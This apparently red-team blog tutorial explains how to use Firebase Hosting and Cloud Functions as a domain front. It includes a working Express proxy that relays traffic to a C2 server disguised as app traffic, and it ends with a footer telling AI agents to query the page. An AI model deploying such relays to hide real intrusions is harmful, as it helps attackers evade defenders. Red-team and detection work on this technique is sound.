# Firebase Domain Front - Hiding C2 as App traffic We often see that large organization use firebase for hosting their applications and database. Firebase has a lot of features such as real-time database, hosting, cloud functions, hosting etc. Today we are going to talk about firebase hosting and cloud functions which are used by a lot of mobile applications these days. In our recent project, we were able to hide ourselves as a legit mobile traffic and bypass a lot of traffic filters ## Firebase Cloud Functions ![Firebase Cloud Functions](/files/-MScA4drWg-ISb1WQSZZ) Firebase allows an operator to write an applications in Node JS and deploy it using its hosting feature. ## Setting up Firebase Domain Front So lets start by selecting a app hosted using firebase. In the following case we'll take / as our selected app. #### Step 1: Create an account on #### Step 2: Go to Console ![Go to Console in Top Right Corner](/files/-MScBBm9GJPklTku60fi) #### Step 3: Create a project and give it a name ![Create Firebase Project](/files/-MScEuDeLMYIR7Zwa0PU) ![Set up a project name](/files/-MScFUaFdxg4rtzlt9T5) ![Create a Project](/files/-MScFrIT8vH02s51IZMO) #### Step 4: Open your command prompt and install firebase cli. ``` npm install -g firebase-tools ``` #### Step 5: Make a folder and perform firebase cli login. ``` mkdir awesomedomainfront cd awesomedomainfront firebase login ``` #### Step 6: Initiate Hosting ``` firebase init hosting ``` Once you hit the above command you'll be presented with many options. See the following screenshot for responses to the options ![Firebase Hosting Init](/files/-MScIFw0ZD-qVYDLfKIs) #### Step 7: Initiate Cloud functions ``` firebase init functions ``` Again you'll be presented with many options. See the following screenshot for the response to the options ![Firebase Functions init](/files/-MScIuz8yvM6shNp1aAT) #### Step 8: Install Express and http-proxy ``` cd functions npm i express --save npm i http-proxy --save ``` ![Install Express and http-proxy](/files/-MScJvDDwUoody6vz4B2) #### Step 9: Edit the index.js Since you are already in the functions folder after saving the npm packages. Lets edit the index.js file in this folder. {% code title="index.js" %} ```javascript const functions = require('firebase-functions'); const express = require('express'); const app = express(); var http = require('http'), httpProxy = require('http-proxy'); var proxy = httpProxy.createProxyServer({secure:false,xfwd:true}); //Setting up X-forwarded for header // your C2 must have a URI . In this case I am using /api/" app.all('/api/*', function(req, res, next){ console.log(req.url); req.url = "/api/" + req.url.slice(5); console.log("Req URL:"+req.url); proxy.web(req, res, { target: 'https://firebase.redteam.cafe:443/' /* Change it to your domain */ }, function(e) { console.log(e); }); res.set('Cache-Control', 'no-cache, no-store'); }); exports.app = functions.https.onRequest(app); // // Create and Deploy Your First Cloud Functions // // https://firebase.google.com/docs/functions/write-firebase-functions // // exports.helloWorld = functions.https.onRequest((request, response) => { // functions.logger.info("Hello logs!", {structuredData: true}); // response.send("Hello from Firebase!"); // }); ``` {% endcode %} #### Step 10: Edit the firebase.json file Go to the parent folder and edit firebase.json ```javascript cd ../ ``` {% code title="firebase.json" %} ```javascript { "hosting": { "headers" : [{ "source" : "**/*.@(js)", "headers": [{ "key" : "Cache-Control", "value" : "no-cache, no-store" }] }], "public": "public", "rewrites": [{ /* your C2 must have a URI . In this case I am using /api/" */ "source": "/api/**", "function": "app", "run":{ "region" : "asia-east2" } }], "ignore": [ "firebase.json", "**/.*", "**/node_modules/**" ] }, "functions": { } } ``` {% endcode %} #### Step 11: Deploy the project Lets start the deployment of our firebase project ```javascript firebase deploy ``` ![Error Message for deploying the project](/files/-MScXKCtY79puvslwWp5) Modify the plan of project from free plan to Pay as you go plan ![Click Modify Plan](/files/-MScYK2ZpMO3S_C0qsaA) ![Select "Pay as you go" plan](/files/-MScZ6AhirqLtYGSfsdP) Now lets try the deployment again. ```javascript firebase deploy ``` ![Deploy Complete](/files/-MSc_wPTPpQRpdmr-aDO) #### Final Tests for the Domain Front Lets check what's hosted on ![Response from firebase.redteam.cafe](/files/-MScWdB94gt3hhO5wHmV) Let's check if our app works fine ![Response from amazingdomainfront.web.app](/files/-MScnEEo-xFqTHKO6JCJ) ### THE FINAL TEST Lets see if we are able to do **Domain Front against a test domain** / ![Domain front with Test Domain is Successful](/files/-MScphoKab_PHORnOA12) #### How to Find more domain fronts Hint: Try to find domains whose CNAME ends with \*.web.app **UPDATE (4/5/2021) : Vincent Yiu created a list for domain fronts in the following github repo** ## Download Source Code Source code can be downloaded from my github repository ## Credits [Vincent Yiu](https://twitter.com/vysecurity), [Jonathan Cheung](https://www.linkedin.com/in/jonathan-cheung-0a8208138/) ### Connect with me Twitter: --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.redteam.cafe/red-team/domain-front/firebase-domain-front-hiding-c2-as-app-traffic.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.